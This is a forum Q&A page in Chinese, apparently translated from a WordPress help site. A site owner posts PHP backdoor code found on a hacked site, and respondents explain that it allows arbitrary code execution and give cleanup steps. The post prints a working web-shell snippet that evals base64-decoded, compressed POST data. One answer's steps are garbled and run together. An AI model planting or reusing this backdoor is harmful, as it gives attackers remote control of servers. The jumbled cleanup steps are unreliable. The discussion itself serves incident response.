如何识别和删除WordPress上的恶意代码?

时间:2017-01-25 作者:Sasha Grievus

在我的wordpress网站上,我发现了几个包含此php代码的全新文件:

if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;}
if(isset($_POST["key"]) && isset($_POST["chk"]) && 
$_POST["key"]=="long_strange_code")
eval(gzuncompress(base64_decode($_POST["chk"])));
这段代码在Wordpress中实际可以做什么?删除文件就足以解决问题?

在过去的几天里,由于mysql内存不足,该网站多次宕机。这可能是原因吗?

3 个回复
最合适的回答,由SO网友:Nathan Johnson 整理而成

这段代码在Wordpress中实际可以做什么?

此代码允许在服务器上任意执行PHP。

删除文件就足以解决问题?

您需要删除所有包含此类后门的文件。查看系统上的每个文件,并将其与WordPress存储库进行比较。

在过去的几天里,由于mysql内存不足,该网站多次宕机。这可能是原因吗?

对很可能有坏人在使用你的服务器进行恶行。

SO网友:T.Todua

您的网站已被黑客入侵。您可以确保99%的网站处于完全控制之下。

(引用另一个site):

您必须执行的步骤(注意,如果您错过任何步骤,您的网站可能仍会被黑客入侵):

首先,将恶意插件/主题报告给plugins[@]wordpress.com 并警告其他可疑插件plugins 和themes. 记住您已安装的可信插件列表和可信主题名称(继续阅读)

  • 更改MYSQL服务器的密码和数据库名称
  • (不是必需的,但强烈建议):更改您的WP登录密码。如果您在其他地方使用了该密码,请在任何地方更改(因为您的密码可能已被窃取)
  • 仅备份wp-content/uploads 文件夹(如果您有自定义主题或其他内容,请将其备份),并从中删除所有内容public_html.uploads (或您备份的其他文件夹),如果有.php 或者说服务器端文件里面,它是干净的,然后把那个文件夹放回站点wp_users 具有的表格$P$B1oYQ3msvVDfFRDwiCY6lViBGmiXMT/ (这是示例密码a. 您应该在第一次进入站点时尽快进行更改)
    • SO网友:Samuel Asor

    首先,您需要检查文件的位置。它是在你的主题文件夹还是插件文件夹中?

    如果是来自插件的内容,则需要检查文件可能已复制到的其他位置。为此,我建议您:

    卸载所有插件,一个接一个地重新安装插件,以确定罪魁祸首如果文件位于根文件夹中,并且不是核心WordPress文件的一部分,请将其删除。

    标签: php   小码农  

    相关推荐

    无法在模板函数.php中使用IS_HOME

    我试图在标题中加载一个滑块,但只在主页上加载。如果有帮助的话,我正在使用Ultralight模板。我正在尝试(在template functions.php中)执行以下操作:<?php if ( is_page( \'home\' ) ) : ?> dynamic_sidebar( \'Homepage Widget\' ); <?php endif; ?> 但这行不通。现在,通过快速的google,我似乎需要将请